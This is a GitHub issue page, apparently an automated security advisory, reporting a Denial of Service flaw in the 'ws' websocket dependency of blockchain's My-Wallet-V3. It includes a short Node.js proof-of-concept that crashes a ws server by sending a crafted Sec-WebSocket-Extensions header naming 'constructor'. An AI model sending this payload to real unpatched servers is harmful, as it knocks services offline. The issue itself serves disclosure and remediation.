My-Wallet-V3 icon indicating copy to clipboard operation
My-Wallet-V3 copied to clipboard
verified publisher icon blockchain

Denial of Service (DoS)

Open larrycameron80 opened this issue 6 years ago • 0 comments

Denial of Service (DoS) Vulnerable module: ws Introduced through: [email protected] Detailed paths Introduced through: blockchain-wallet-client@blockchain/My-Wallet-V3#c0bf5615c862fb8d7ec5e3f5031c2998b8ddc690 › [email protected] Remediation: Upgrade to [email protected]. Overview ws is a simple to use websocket client, server and console for node.js.

Affected versions of this package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.

PoC:

const WebSocket = require('ws'); const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor'

const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8', Sec-WebSocket-Extensions: ${payload}, 'Upgrade: websocket', '\r\n' ].join('\r\n');

const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); });

larrycameron80 avatar Sep 17 '19 02:09 larrycameron80